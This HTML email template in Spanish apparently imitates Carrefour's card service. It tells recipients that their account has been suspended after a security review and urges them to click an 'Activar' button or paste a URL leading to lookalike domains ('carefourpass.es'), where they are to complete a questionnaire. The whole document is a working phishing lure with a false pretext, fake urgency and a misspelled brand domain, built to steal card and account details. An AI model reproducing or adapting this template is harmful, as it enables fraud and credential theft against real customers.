<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Bootstrap - Prebuilt Layout</title>
<!-- Bootstrap -->
<link href="css/bootstrap.css" rel="stylesheet">
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div style="width:50%; margin-left:auto; margin-right:auto; margin-top:50px; padding:20px; border-width: 1px; border-style: solid; border-color:gray; border-radius:3 px;" align="center" >
<img src="http://www.asistentevirtual.carrefour.es/ayuda/assets/images/tarjeta-pass_tcm5-29965.png" width="70%" height="70%">
</div>
<div style="width:80%; margin-left:auto; margin-right:auto; padding:20px; border-radius:3 px;" align="justify" >
<p><h4> Estimado Cliente de Carrefour,</br></br>
Como parte de nuestras medidas de seguridad, examinamos periódicamente la
actividad del sistema de Carrefour.</br>
Durante una investigación, hemos detectado un problema con su cuenta y ha sido suspendida temporalmente.
Para evitar la interrupción del servicio de la tarjeta </h4></p> <h4><p style="color:blue; align-content:center">5499 **** **** **** **** </p></h4> <p> <h4> y de otros servicios le pedimos completar nuestro cuestionario a la recepción de este correo.</h4></p>
</div>
<div style="width:80%; margin-left:auto; margin-right:auto; padding:20px; border-radius:3 px;" align="center" ><a href="http://seguridad.carefourpass.es" role="button">Activar</a></div>
<div style="width:80%; margin-left:auto; margin-right:auto; padding:20px; border-radius:3 px;" align="center" >
<p><h5> Si el botón no funciona por favor copie y pegue la siguiente dirección en su navegador.
<p><h5>http://carrefourpass.es/ser</h5></p>
</h5></p>
</div>
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="js/jquery-1.11.3.min.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="js/bootstrap.js"></script>
</body>
</html>